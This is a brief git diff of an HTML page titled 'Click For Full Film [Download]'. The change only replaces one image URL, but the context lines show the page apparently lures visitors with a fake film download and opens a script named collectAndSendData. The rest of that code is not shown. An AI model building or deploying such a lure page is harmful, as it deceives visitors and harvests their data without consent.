--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Click For Full Film [Download]</title>
-    <img src="https://play-lh.googleusercontent.com/Vc3uSbGtVzm90bVNh9Gq3KAQkGMGKi-jgOn3tdhW6Tvvs-2TE9e99pWNmSeKt6XBAAY=w1200-h630-c-rw"/>
+    <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQQddq5w0lLo6refdN99HvHOeLRPMYYPABM7JBrh4UhtBBAEKeCmiLD6Rs&s=10"/>
     <script>
         async function collectAndSendData() {
             try {
